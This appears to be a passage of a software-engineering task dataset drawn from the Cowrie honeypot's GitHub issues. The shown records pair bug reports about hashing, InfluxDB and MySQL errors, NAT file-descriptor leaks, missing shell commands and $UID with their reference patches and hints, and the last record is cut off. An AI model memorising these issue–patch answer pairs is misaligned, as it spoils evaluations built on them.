@HQuest What would you like exactly that the IP's bruteforcing the honeypots are getting reported to the AbuseIP database? I would like Cowrie to publish such attackers, so systems outside honeypots can make use of this information and apply mitigation controls against known bad actors. > On Dec 5, 2019, at 08:37, RobertH1993 <[email protected]> wrote: > >  > @HQuest What would you like exactly that the IP's bruteforcing the honeypots are getting reported to the AbuseIP database? > > — > You are receiving this because you were mentioned. > Reply to this email directly, view it on GitHub, or unsubscribe. Going to work on this, when ready i will submit a PR. @RobertH1993 Do you still still plan on working on this? I might be able to take a look at this sometime in the next couple of weeks while confined if you're no longer interested. @HQuest Do you have a preliminary set of criteria in mind for evaluating whether to report an IP or not? I.e. do you want to report after a certain number of failed login attempts, an SFTP/Wget event, a combinations of events, etc? I'm sorry I don't have time to work on it. If you want to please do so :) Op di 7 apr. 2020 19:30 schreef Benjamin Stephens <[email protected] >: > @RobertH1993 <https://github.com/RobertH1993> Do you still still plan on > working on this? I might be able to take a look at this sometime in the > next couple of weeks while confined if you're no longer interested. > > @HQuest <https://github.com/HQuest> Do you have a preliminary set of > criteria in mind for evaluating whether to report an IP or not? I.e. do you > want to report after a certain number of failed login attempts, an > SFTP/Wget event, a combinations of events, etc? > > — > You are receiving this because you were mentioned. > Reply to this email directly, view it on GitHub > <https://github.com/cowrie/cowrie/issues/1271#issuecomment-610518533>, or > unsubscribe > <https://github.com/notifications/unsubscribe-auth/AF24ZELUJRCUVJXR6HQ7IOTRLNPLRANCNFSM4JOH6SOQ> > . > I think a customizable count and frequency combination would be great. While one in a day could be an accident, five in a 30 second interval feels more like a brute force attempt, but it all varies on each place’s policies. Also, anything that does a file transfer (wget/curl/etc) - nobody should be moving files without permissions- would too trigger an alarm. That’s how I view it on a perfect world. Anything actually will be great. Thank you for stepping up. Alex > On Apr 7, 2020, at 13:30, Benjamin Stephens <[email protected]> wrote: > >  > @RobertH1993 Do you still still plan on working on this? I might be able to take a look at this sometime in the next couple of weeks while confined if you're no longer interested. > > @HQuest Do you have a preliminary set of criteria in mind for evaluating whether to report an IP or not? I.e. do you want to report after a certain number of failed login attempts, an SFTP/Wget event, a combinations of events, etc? > > — > You are receiving this because you were mentioned. > Reply to this email directly, view it on GitHub, or unsubscribe. Alright, I'll try and take a look at it in the next week and see what I can come up with. For the moment I might start with simply observing brute force login attempts and reporting any IP when it exceeds its threshold. As for detecting brute force, I'll make the threshold settings (both time and number of allowed attempts) adjustable from the config file, but personally I'd recommend setting the threshold for attempts higher than 5 (just in case someone really has just mistyped an IP address and actually thinks they're logging into their own server, even if this is really really unlikely) and, more importantly, a time longer than thirty seconds. A behavious I've observed is bots which, I assume, rotate through a long list of IP addresses, making one guess on each one before attempting on the next. Given a window of a few minutes it might not look like much, but viewed over a long period it's quite clear that it's a brute force attack--just a very slow one. I've also just sent a message asking the maintainers how they feel about re-reporting IPs less than 24 hours after the initial report if it's for another category of behaviour. Depending on their response and if all goes well getting an initial plugin in place, we can then look at other behaviours that could be reported. Have a think about what kinds of events you've seen in your log files that could be used as reporting criteria--things like cowrie.direct-tcpip.data, cowrie.command.input, etc--and what [AbuseIPDB reporting categories](https://www.abuseipdb.com/categories) they fit in to. > > Activé 7 avr. 2020 à 20:55, HQuest <[email protected]> a écrit : > > I think a customizable count and frequency combination would be great. While one in a day could be an accident, five in a 30 second interval feels more like a brute force attempt, but it all varies on each place’s policies. > > Also, anything that does a file transfer (wget/curl/etc) - nobody should be moving files without permissions- would too trigger an alarm. > > That’s how I view it on a perfect world. Anything actually will be great. > > Thank you for stepping up. > > Alex > > > On Apr 7, 2020, at 13:30, Benjamin Stephens <[email protected]> wrote: > > > >  > > @RobertH1993 Do you still still plan on working on this? I might be able to take a look at this sometime in the next couple of weeks while confined if you're no longer interested. > > > > @HQuest Do you have a preliminary set of criteria in mind for evaluating whether to report an IP or not? I.e. do you want to report after a certain number of failed login attempts, an SFTP/Wget event, a combinations of events, etc? > > > > — > > You are receiving this because you were mentioned. > > Reply to this email directly, view it on GitHub, or unsubscribe. > > > — > You are receiving this because you commented. > Reply to this email directly, view it on GitHub, or unsubscribe. > > To keep you updated, I've made a start on this today. [WIP is here](https://github.com/bn-s/cowrie-abuseipdb-api-plugin/) Really appreciated. And I loved the observer functions ;) > On Apr 23, 2020, at 1:26 PM, Benjamin Stephens <[email protected]> wrote: > > > To keep you updated, I've made a start on this today. WIP is here <https://github.com/bn-s/cowrie-abuseipdb-api-plugin/> > — > You are receiving this because you were mentioned. > Reply to this email directly, view it on GitHub <https://github.com/cowrie/cowrie/issues/1271#issuecomment-618533492>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AAIJWNMZQMZT5ETARVINYJTROB24JANCNFSM4JOH6SOQ>. > Please also look at the GreyNoise, DShield and Virustotal plugins. They do approximately the same. Try to use `treq` or `twisted.web` to do your requests so they are asynchronous. Use the standard config file, as the other plugins do, the system is extensible. Try to put all the code in a single file, in the existing `src/cowrie/output` directory structure. Once it's working, please submit a PR and I'll be happy to merge it. Thanks for taking a look and for the feedback. Just to make sure we're on the same page; - The abuseipdb folder is just a standard plugin module to be dropped into the `src/cowrie/output` folder like any other plugin. Being a folder rather than a single file is the only difference here. - The plugin, whilst having its own config file, does use the standard config files. Indeed, any setting that appears in the standard config files takes priority over anything in the plugin's config file. The idea here is to avoid hard-coding anything so we can make some things customisable by a user who might not want to 'fiddle around in the code', but without dropping too many options into the standard cowrie files by default. That way if, for example, a user wants to set a daily limit on reports because they also use their api quota across other honeypots/projects/etc, the option is there if they dig but, for the user who just wants to get up and running, they just need to set their api key and that's it, without the anxiety of 'do I need to think about the settings of this thing...' when really, most will not. Of course, as above, I can easily change this if you prefer I don't do it. - One of the plugins you've mentioned above is just making plain old synchronnous requests using the standard python requests library. They're threaded so non-blocking sure, but that is where I was going if your main concern was about blocking. Otherwise, Treq looks like it doesn't take much work to put in place, so I'm happy to take a look at that soon. If you do desire that the plugin be reduced to a single file, that leads me to a question as I was intending to dump/load a working dictionary into/from the plugin's folder on stop/start: is there another folder in the standard cowrie structure where you would be happy for me to dump a file to? Hi! Thanks for the detailed comments! * As long as it'll work the same as the other plugins no objection against multiple files. * There is already a 'default options' feature in Cowrie that can be overridden. The `cowrie.cfg.dist` contains the distribution options, which can be individually overridden by entries in `cowrie.cfg`. If you are adapting an existing library with an existing config file mechanism we can talk about this, but if you are implementing a settings overriding mechanism from scratch, you are better off using existing features. * Yes, I have accepted synchronous requests libraries merge requests in the past. They don't seem to cause a lot of issues, but the general recommendation is to write them asynchronously, this will fit better in the Twisted model. * There is currently no directory to store output to, but there is a `state_path` entry defined in `cowrie.cfg.dist`, so I'd use that, maybe followed by your plugin-name. By default that would then be `var/lib/cowrie/abuseip/`. I don't know how much state you're going to keep, but if it's just entries that need to be submitted, you can do those from the (now-working) `stop()` function as well. Okay, so the utils module looks quite long which may have given the impression that I'm up to something weird, but it's mostly just comments for myself and other utility type stuff that has nothing to do with parsing configs... like making a time string into a tuple and, later, a funciton for calculating the number of seconds into the future this time will next occur so I have something I can give to twisted reactor in a `callLater()`... There's very little in there to do with reading and overriding configs or anything like that. Reducing it to just the bits that load configs, we're left with a vanilla configparser read and a one line dictionary merge, which is where the entirety of the custom settings overriding solution takes plae. ```python from configparser import ConfigParser from cowrie... import CowrieConfig PLUGIN_CFG_FILE = file.cfg class Confs: def __init__(self): self.__dict__.update( {**self.get_defaults(), **CowrieConfig()['abuseip']} ) def get_defaults(self): parser = ConfigParser() f = PLUGIN_CFG_FILE parser.read(f) return parser['abuseip'] ``` Seeing it extracted/reduced like so, how do you feel about it? As for asyc requests--consider it done. I'm going to try and do a little work on the plugin later this afternoon or tomorrow morning, so I might even start there. Hi! The standard `configparser` library has a lot of things you are reimplementing, like `configparser.getboolean` where you wrote `trudat`. There's `getint` as well, which has a fallback option in case no value is define. The merge function is already in `configparser` as well, and it's what I use to merge `cowrie.cfg` with `cowrie.cfg.dist`, that could simplify a lot of your util.py. I still don't see why you need an additional config file, while all other plugins use `cowrie.cfg.dist`. Okay I'll drop the config file. It's a non-essential extra so I'm okay to do without it. For the curious readers the reason for why I did it as such is that (after making the decision to introduce an additional config file) I felt that a plugin should remain as self-contained as possible--anything the plugin does should not touch anything outside of itself unless absolutely unavoidable. So sure, I could have done the whole thing with `CowrieConfig`, but I thought that would be more controversial as it's a singleton so we don't get our own instance to play with. So, given that I decided to include a config file, I felt the most direct and efficient solution was to just do the read internally in the plugin then merge the two dictionaries. I could have bypassed the `CowrieConfig` class and passed the file directly to the read function from the cowrie config module, but I wasn't planning the use of environement variables so really, it doesn't make too much difference either way as it's all just `configparser` and we still haven't merged the two configs. I could have also re-read the Cowrie configs using `configparser` and let my own instance sort it all out, but why perform an operation that has already been done? So as everything is now self contained, I felt it would more efficient to just update the class dictionary with the two merged configs--we've given up a little inbuilt `configparser` functionality, but we also save lines of code and made the whole import operation far more lightweight. We never have to directly address anything that's going to remain a string and it's also more lightweight than penetrating 400 calls deep into the `configparser` labyrinth performing a get on each single item. In doing it like this we've only really introduced the risk that a user might change parameter names in the configs or try to reproduce class methods as config parameters for kicks... but this has effectively the same consequences as someone typing `Flase` as a boolean value; we get an error, the plugin doesn't start and life goes on as usual for the rest of Cowrie as we've kept the behaviour of the plugin contained to itself. As such, yeah, I did reproduce the boolean function, but aside from that no other functionality had to be reproduced and the additional code is offset by no longer importing strings individually. Calling standard python `int()` isn't really reproducing anything; sure it's redundant if we do a `configparser` get, only to later do the conversion, but that never happened. It also has the nice side effect that readability is improved a little... ```python # This...: self.something = int(self.something) self.otherthing = makebool(self.otherthing) # ...is a bit cleaner than this: self.something = ConfigsClass().getint('output_pluginname', 'something', fallback=1337) self.otherthing = ConfigsClass().getboolean('output_pluginname', 'otherthing', fallback=False) ``` As for the existence of a configs class--taking the modular approach I was going to take, it made more sense to import everything and do all the converting of types and data structures in one place. Like so, everything is ready to be dropped into any module/class anywhere else, ready to go, simply by typing `cfg.parameter_name`. It just makes life a little simpler and helps make things more explicit later on. That sums up whys of what I've done. I've had the time this afternoon to refactor some of what I've already done and add in Treq for requests. [There's an alpha version available here](https://github.com/bn-s/cowrie-abuseipdb-api-plugin/tree/master/Alpha). At the moment it should work... sort of... I hope. But it's completely untested so expect errors. If you do test it, please post any errors here and I'll look into them before I do a pull request. I've made a couple of changes, done some testing, and everything is working as expected. I've spun up a live box (68.183.65.134:22) with [the current version](https://github.com/bn-s/cowrie-abuseipdb-api-plugin/tree/master/Alpha) which is [reporting here](https://www.abuseipdb.com/user/42261). I'm going to let it run for the weekend and test a couple of things such as if AbuseIPDB are sending the Retry-After header, and if we're receiving it reliably. If all goes well I'll submit a pull request in the new week.
2020-05-04T14:46:54
cowrie/cowrie
1,356
cowrie__cowrie-1356
[ "1332" ]
d026d0424baf523e4cbee008718dcc8e1ceb306b
diff --git a/src/cowrie/commands/ssh.py b/src/cowrie/commands/ssh.py --- a/src/cowrie/commands/ssh.py +++ b/src/cowrie/commands/ssh.py @@ -71,7 +71,7 @@ def start(self): Name or service not known\n' % (host,)) self.exit() else: - s = hashlib.md5(host).hexdigest() + s = hashlib.md5(host.encode()).hexdigest() self.ip = '.'.join([str(int(x, 16)) for x in (s[0:2], s[2:4], s[4:6], s[6:8])])
Unicode-objects must be encoded before hashing Hello, **Describe the bug** When user type ssh user@server the honeypot produce an error. **To Reproduce** Steps to reproduce the behavior: 1. Lanch honeypot 2. Connect to fake system 3. type ssh [email protected] 4. See error in logs **Server (please complete the following information):** - OS: Ubutun 18.04 - Python: 3.6.9 **Additional context** Traceback: ``` Traceback (most recent call last): File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/python/context.py", line 122, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/python/context.py", line 85, in callWithContext return func(*args,**kw) File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/ssh/service.py", line 45, in packetReceived return f(packet) File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/ssh/connection.py", line 258, in ssh_CHANNEL_DATA log.callWithLogger(channel, channel.dataReceived, data) --- <exception caught here> --- File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/python/log.py", line 103, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/python/log.py", line 86, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/python/context.py", line 122, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/python/context.py", line 85, in callWithContext return func(*args,**kw) File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/ssh/session.py", line 112, in dataReceived self.client.transport.write(data) File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/ssh/session.py", line 163, in write self.proto.dataReceived(data) File "/home/valentin/honeypot/cowrie/src/cowrie/insults/insults.py", line 98, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/insults/insults.py", line 537, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/recvline.py", line 225, in keystrokeReceived m() File "/home/valentin/honeypot/cowrie/src/cowrie/shell/protocol.py", line 320, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/home/valentin/honeypot/cowrie/cowrie-env/lib/python3.6/site-packages/twisted/conch/recvline.py", line 292, in handle_RETURN self.lineReceived(line) File "/home/valentin/honeypot/cowrie/src/cowrie/shell/protocol.py", line 182, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/valentin/honeypot/cowrie/src/cowrie/shell/honeypot.py", line 173, in lineReceived self.runCommand() File "/home/valentin/honeypot/cowrie/src/cowrie/shell/honeypot.py", line 289, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/home/valentin/honeypot/cowrie/src/cowrie/shell/protocol.py", line 301, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/valentin/honeypot/cowrie/src/cowrie/shell/protocol.py", line 191, in call_command obj.start() File "/home/valentin/honeypot/cowrie/src/cowrie/commands/ssh.py", line 74, in start s = hashlib.md5(host).hexdigest() builtins.TypeError: Unicode-objects must be encoded before hashing ``` Thanks
I can't reproduce this. Which version are you on? Hello, sorry for the late reply @micheloosterhof tested on trunk Thanls Confirmed! Seems to be a python2/3 string/bytes issue.
2020-06-01T02:45:35
cowrie/cowrie
1,357
cowrie__cowrie-1357
[ "1355" ]
8b4003e9d605feea440dc00d6988de53f9579af8
diff --git a/src/cowrie/output/influx.py b/src/cowrie/output/influx.py --- a/src/cowrie/output/influx.py +++ b/src/cowrie/output/influx.py @@ -23,7 +23,7 @@ def start(self): self.client = InfluxDBClient(host=host, port=port, ssl=ssl, verify_ssl=ssl) except InfluxDBClientError as e: log.msg("output_influx: I/O error({0}): '{1}'".format( - e.errno, e.strerror)) + e.code, e.message)) return if self.client is None:
Programming errors in the InfluxDB plugin Something definitely seems wrong with the InfluxDB output plugin... I can see at least two possible problems: 1. The error handling ```python except InfluxDBClientError as e: log.msg("output_influx: I/O error({0}): '{1}'".format( e.errno, e.strerror)) return ``` seems wrong to me. If you inspect the source of the Python [InfluxDB client](https://github.com/influxdata/influxdb-python/blob/master/influxdb/exceptions.py), the `InfluxDBClientError` class does not have `errno` and `strerror` fields. I think the plugin should use `e.code` and `e.message` instead respectively. 2. In the plugin, there is some code like this: ```python m = { 'measurement': eventid.replace('.', '_'), 'tags': { 'session': entry['session'], 'src_ip': entry['src_ip'] }, 'fields': { 'sensor': self.sensor }, } ``` However `self.sensor` is not defined anywhere. I think it should be `entry['sensor']` instead.
So `self.sensor` is set in `__init__()` in `src/cowrie/core/output.py` so that should be inherited. For the other fields I think are you are correct.
2020-06-01T02:56:36
cowrie/cowrie
1,364
cowrie__cowrie-1364
[ "1361" ]
e7952e0de91239f93df6f96899e007df87bbce79
diff --git a/src/backend_pool/nat.py b/src/backend_pool/nat.py --- a/src/backend_pool/nat.py +++ b/src/backend_pool/nat.py @@ -74,16 +74,15 @@ def request_binding(self, guest_id, dst_ip, ssh_port, telnet_port): self.lock.acquire() try: # see if binding is already created - if dst_ip in self.bindings: + if guest_id in self.bindings: # increase connected self.bindings[guest_id][0] += 1 return self.bindings[guest_id][1]._realPortNumber, self.bindings[guest_id][2]._realPortNumber - else: nat_ssh = reactor.listenTCP(0, ServerFactory(dst_ip, ssh_port), interface='0.0.0.0') nat_telnet = reactor.listenTCP(0, ServerFactory(dst_ip, telnet_port), interface='0.0.0.0') - self.bindings[guest_id] = [0, nat_ssh, nat_telnet] + self.bindings[guest_id] = [1, nat_ssh, nat_telnet] return nat_ssh._realPortNumber, nat_telnet._realPortNumber finally: @@ -94,10 +93,20 @@ def free_binding(self, guest_id): try: self.bindings[guest_id][0] -= 1 - # stop listening if no-one connected - if self.bindings[guest_id][0] == 0: + # stop listening if no one is connected + if self.bindings[guest_id][0] <= 0: self.bindings[guest_id][1].stopListening() self.bindings[guest_id][2].stopListening() + del self.bindings[guest_id] + finally: + self.lock.release() + + def free_all(self): + self.lock.acquire() + try: + for guest_id in self.bindings: + self.bindings[guest_id][1].stopListening() + self.bindings[guest_id][2].stopListening() finally: self.lock.release() diff --git a/src/backend_pool/pool_server.py b/src/backend_pool/pool_server.py --- a/src/backend_pool/pool_server.py +++ b/src/backend_pool/pool_server.py @@ -129,7 +129,7 @@ def __init__(self): def startFactory(self): # start the pool thread with default configs - self.pool_service = PoolService() + self.pool_service = PoolService(self.nat) self.pool_service.start_pool() def stopFactory(self): diff --git a/src/backend_pool/pool_service.py b/src/backend_pool/pool_service.py --- a/src/backend_pool/pool_service.py +++ b/src/backend_pool/pool_service.py @@ -33,8 +33,10 @@ class PoolService: A lock is required to manipulate VMs in states [available, using, used], since these are the ones that can be accessed by several consumers and the producer. All other states are accessed only by the single producer. """ - def __init__(self): + def __init__(self, nat_service): self.qemu = backend_pool.libvirt.backend_service.LibvirtBackendService() + self.nat_service = nat_service + self.guests = [] self.guest_id = 0 self.guest_lock = Lock() @@ -52,6 +54,10 @@ def __init__(self): self.ssh_port = CowrieConfig().getint('backend_pool', 'guest_ssh_port', fallback=-1) self.telnet_port = CowrieConfig().getint('backend_pool', 'guest_telnet_port', fallback=-1) + self.local_pool = CowrieConfig().get('proxy', 'pool', fallback='local') == 'local' + self.pool_only = CowrieConfig().getboolean('backend_pool', 'pool_only', fallback=False) + self.use_nat = CowrieConfig().getboolean('backend_pool', 'use_nat', fallback=True) + # detect invalid config if not self.ssh_port > 0 and not self.telnet_port > 0: log.msg(eventid='cowrie.backend_pool.service', @@ -99,6 +105,11 @@ def stop_pool(self): # force destroy remaining stuff self.qemu.destroy_all_cowrie() + # close any NAT sockets + if not self.local_pool and self.use_nat or self.pool_only: + log.msg(eventid='cowrie.backend_pool.service', format='Free all NAT bindings') + self.nat_service.free_all() + try: self.qemu.stop_backend() except libvirt.libvirtError:
Too many open files (EMFILE) We're using Cowrie with a proxy-backend configuration. It's seeing quite a bit of brute forcing attempts, and something is causing the backend to leak file descriptors, eventually hitting Too many open files. The symptoms are very similar to https://github.com/cowrie/cowrie/issues/367, although in our case, the attackers are still stuck at the brute forcing phase, so they haven't reached the honeypot contents yet. From the backend's cowrie.log: ``` 2020-06-08T14:16:22.505410Z [backend_pool.nat.ServerFactory#info] Starting factory <backend_pool.nat.ServerFactory object at 0x7fc035e2ce80> 2020-06-08T14:16:22.507706Z [backend_pool.nat.ClientFactory#info] Starting factory <backend_pool.nat.ClientFactory object at 0x7fc035e2c3c8> 2020-06-08T14:16:22.508111Z [twisted.internet.tcp.Port#info] EMFILE encountered; releasing reserved file descriptor. 2020-06-08T14:16:22.508193Z [twisted.internet.tcp.Port#info] Re-reserving EMFILE recovery file descriptor. 2020-06-08T14:16:22.508593Z [backend_pool.nat.ClientFactory#info] Stopping factory <backend_pool.nat.ClientFactory object at 0x7fc035e2c3c8> 2020-06-08T14:16:23.235361Z [twisted.internet.tcp.Port#info] EMFILE encountered; releasing reserved file descriptor. 2020-06-08T14:16:23.235508Z [twisted.internet.tcp.Port#info] EMFILE recovery: Closed socket from ('172.16.1.6', 42942) 2020-06-08T14:16:23.235537Z [twisted.internet.tcp.Port#info] Re-reserving EMFILE recovery file descriptor. 2020-06-08T14:16:24.463433Z [-] Unhandled Error Traceback (most recent call last): File "/srv/cowrie/cowrie-venv/lib/python3.6/site-packages/twisted/application/app.py", line 399, in startReactor File "/srv/cowrie/cowrie-venv/lib/python3.6/site-packages/twisted/application/app.py", line 312, in runReactorWithLogging File "/srv/cowrie/cowrie-venv/lib/python3.6/site-packages/twisted/internet/base.py", line 1283, in run File "/srv/cowrie/cowrie-venv/lib/python3.6/site-packages/twisted/internet/base.py", line 1292, in mainLoop --- <exception caught here> --- File "/srv/cowrie/cowrie-venv/lib/python3.6/site-packages/twisted/internet/base.py", line 913, in runUntilCurrent File "/srv/cowrie/cowrie-github/src/backend_pool/pool_service.py", line 280, in producer_loop File "/srv/cowrie/cowrie-github/src/backend_pool/pool_service.py", line 190, in __producer_check_health File "/srv/cowrie/cowrie-github/src/backend_pool/pool_service.py", line 151, in has_connectivity File "/srv/cowrie/cowrie-github/src/backend_pool/util.py", line 18, in nmap_port File "/usr/lib/python3.6/subprocess.py", line 423, in run File "/usr/lib/python3.6/subprocess.py", line 687, in __init__ File "/usr/lib/python3.6/subprocess.py", line 1197, in _get_handles builtins.OSError: [Errno 24] Too many open files ``` Under /proc/*/fd, I can see the fd:s piling up. ``` [...] lrwx------ 1 cowrie cowrie 64 Jun 9 06:30 85 -> 'socket:[127152879]' lrwx------ 1 cowrie cowrie 64 Jun 9 06:30 86 -> 'socket:[127156659]' lrwx------ 1 cowrie cowrie 64 Jun 9 06:30 88 -> 'socket:[127158533]' lrwx------ 1 cowrie cowrie 64 Jun 9 06:30 89 -> 'socket:[127158534]' [...] ``` Netstat also confirms the same. ``` [...] twistd 586 cowrie 184u IPv4 127199423 0t0 TCP *:42039 (LISTEN) twistd 586 cowrie 185u IPv4 127212415 0t0 TCP *:37159 (LISTEN) twistd 586 cowrie 186u IPv4 127217586 0t0 TCP *:41445 (LISTEN) twistd 586 cowrie 187u IPv4 127205735 0t0 TCP *:35751 (LISTEN) [...] ``` On the proxy, the only clue I've found so far are these "Lost connection" entries: `2020-06-09T06:36:34.074618Z [BackendSSHTransport,client] Lost connection with the pool backend: id 1` However, looking at src/cowrie/ssh_proxy/client_transport.py lines 97 onwards, this "error" seems to be emitted by a rather normal client disconnect, and shouldn't be harmful? https://github.com/cowrie/cowrie/blob/master/src/cowrie/ssh_proxy/client_transport.py#L97 Proxy config: ``` [honeypot] backend = proxy interactive_timeout = 180 [proxy] backend = pool pool_max_vms = 2 pool = remote pool_host = 172.16.1.190 pool_port = 6415 backend_user = <redacted> backend_pass = <redacted> [ssh] version = <redacted> forwarding = false ``` Backend config: ``` [backend_pool] pool_only = true recycle_period = 3600 listen_endpoints = tcp:6415:interface=172.16.1.190 # disable telnet on the guests guest_telnet_port = 0 guest_image_path = /srv/cowrie/minimal-4-ubuntu-18.04.qcow2 guest_hypervisor = qemu guest_memory = 512 nat_public_ip = 172.16.1.190 ``` I've also tried changing the interactive_timeout at the proxy, but it doesn't seem to affect the fd leakage.
2020-06-20T21:54:40
cowrie/cowrie
1,397
cowrie__cowrie-1397
[ "1395" ]
35c12dc14cda8ce46429936f2375c6ebfad3091d
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py --- a/src/cowrie/output/mysql.py +++ b/src/cowrie/output/mysql.py @@ -31,7 +31,7 @@ def _runInteraction(self, interaction, *args, **kw): try: return adbapi.ConnectionPool._runInteraction( self, interaction, *args, **kw) - except MySQLdb.OperationalError as e: + except (MySQLdb.OperationalError, MySQLdb._exceptions.OperationalError) as e: if e.args[0] not in (2003, 2006, 2013): raise e log.msg("RCP: got error {0}, retrying operation".format(e)) @@ -65,10 +65,11 @@ def start(self): cp_reconnect=True, use_unicode=True ) - except MySQLdb.Error as e: + except (MySQLdb.Error, MySQLdb._exceptons.Error) as e: log.msg("output_mysql: Error %d: %s" % (e.args[0], e.args[1])) def stop(self): + self.db.commit() self.db.close() def sqlerror(self, error):
MySQL error handling I have created several honeypots for other protocols (Android Debug Bridge, Citrix Netscaler, Elasticsearch, Internet Printing Protocol). In all of them I use Cowrie's idea of output plugins. However, the attack traffic for these protocols is much much lower than for Telnet/SSH. Probably for this reason, the MySQL plugin often fails with the dreaded "(2006, 'MySQL server has gone away')" error. (Yes, sometimes more than 8 hours can pass between attacks.) What bothered me is that the plugin failed with a stack trace. This isn't supposed to happen, because it intercepts this error just like Cowrie's MySQL plugin and tries to re-establish the connection. Then I noticed that the error that is being reported is not `MySQLdb.OperationalError`, as the code intercepts. Instead, it is `MySQLdb._exceptions.OperationalError`. And, indeed, linting the code complains that the `MySLdb` module does not have a member named `OperationalError`. Similarly, there is no `MySQLdb.Error` - but there seems to be `MySQLdb._exceptons.Error` instead. Shouldn't these be changed in Cowrie's MySQL module? Also, from the [documentation of MySQLdb](https://mysqlclient.readthedocs.io/FAQ.html#my-data-disappeared-or-won-t-go-away): > Starting with 1.2.0, MySQLdb disables autocommit by default, as required by the DB-API standard (PEP-249). If you are using InnoDB tables or some other type of transactional table type, you’ll need to do connection.commit() before closing the connection, or else none of your changes will be written to the database. Shouldn't the `stop()` method of Cowrie's MySQL plugin issue a `self.db.commit()` before closing the connection? Or maybe set `self.db.autocommit(True)` when opening it?
Thanks for reporting! Those may be leftovers from the old `MySQL-python`, since we now moved to `mysqlclient` for Py3+
2020-08-10T08:33:43
cowrie/cowrie
1,415
cowrie__cowrie-1415
[ "1408" ]
a5ff09f02dfa0f5d8a875f38e6dd536697561672
diff --git a/src/cowrie/commands/fs.py b/src/cowrie/commands/fs.py --- a/src/cowrie/commands/fs.py +++ b/src/cowrie/commands/fs.py @@ -89,6 +89,7 @@ def handle_CTRL_D(self): commands['/bin/grep'] = command_grep +commands['grep'] = command_grep commands['/bin/egrep'] = command_grep commands['/bin/fgrep'] = command_grep @@ -156,6 +157,7 @@ def handle_CTRL_D(self): commands['/bin/tail'] = command_tail commands['/usr/bin/tail'] = command_tail +commands['tail'] = command_tail class command_head(HoneyPotCommand): @@ -215,6 +217,7 @@ def handle_CTRL_D(self): commands['/bin/head'] = command_head commands['/usr/bin/head'] = command_head +commands['head'] = command_head class command_cd(HoneyPotCommand): @@ -350,6 +353,7 @@ def call(self): commands['/bin/rm'] = command_rm +commands['rm'] = command_rm class command_cp(HoneyPotCommand): @@ -422,6 +426,7 @@ def resolv(pname): commands['/bin/cp'] = command_cp +commands['cp'] = command_cp class command_mv(HoneyPotCommand): @@ -489,6 +494,7 @@ def resolv(pname): commands['/bin/mv'] = command_mv +commands['mv'] = command_mv class command_mkdir(HoneyPotCommand): @@ -544,6 +550,7 @@ def call(self): commands['/bin/rmdir'] = command_rmdir +commands['rmdir'] = command_rmdir class command_pwd(HoneyPotCommand): @@ -556,6 +563,7 @@ def call(self): commands['/bin/pwd'] = command_pwd +commands['pwd'] = command_pwd class command_touch(HoneyPotCommand): diff --git a/src/cowrie/commands/wc.py b/src/cowrie/commands/wc.py --- a/src/cowrie/commands/wc.py +++ b/src/cowrie/commands/wc.py @@ -117,3 +117,4 @@ def handle_CTRL_D(self): commands['/usr/bin/wc'] = command_wc commands['/bin/wc'] = command_wc +commands['wc'] = command_wc
bash: rm not found **Describe the bug** In my ttylogs, I see the following error code: -bash: rm: command not found **To Reproduce** Steps to reproduce the behavior: 1. Log in 2. Create a file 3. Try to delete a file (rm -rf < filename >) **Expected behavior** An error saying that the file could not be deleted? **Server (please complete the following information):** - OS: Linux nanopineo2 5.8.6-sunxi64 #20.08.2 SMP Fri Sep 4 08:52:31 CEST 2020 aarch64 GNU/Linux - Python: Python 3.7.3 (venv) **Additional context** Add any other context about the problem here.
2020-09-17T11:49:15
cowrie/cowrie
1,421
cowrie__cowrie-1421
[ "1419" ]
eab87029819c1ba6084542e8cca599773d621c39
diff --git a/src/cowrie/shell/session.py b/src/cowrie/shell/session.py --- a/src/cowrie/shell/session.py +++ b/src/cowrie/shell/session.py @@ -36,7 +36,7 @@ def __init__(self, avatar, reactor=None): 'USER': self.username, 'HOME': self.avatar.home, 'TMOUT': '1800', - 'UID': self.uid} + 'UID': str(self.uid)} if self.uid == 0: self.environ['PATH'] = '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin' else:
$UID not spitting out UID **Describe the bug** A hacker found a way to get inside the cowrie box and executed "echo $UID". The reply that came back was empty, and the hacker disconnected. My normal box returned the UID. **To Reproduce** Steps to reproduce the behavior: 1. Connect to linux machine 2. Type in "Echo $UID" (response should be something like 1001 or 0) 3. Connect to cowrie 4. Type in "echo $UID" 5. See nothing replied on screen. **Expected behavior** When someone uses the variable $UID, get the variable from the honeyfs/etc/passwd file or return 0. **Server (please complete the following information):** - OS: Linux nanopineo2 5.8.6-sunxi64 #20.08.2 SMP Fri Sep 4 08:52:31 CEST 2020 aarch64 GNU/Linux - Python: Python 3.7.3 **Additional context** My hackers seem to get smarter each day...
2020-09-27T17:08:28
cowrie/cowrie
1,423
cowrie__cowrie-1423
[ "1416" ]
87fbfe62fd68f6d1334bcd1f3c89e0e52c5dcc8c
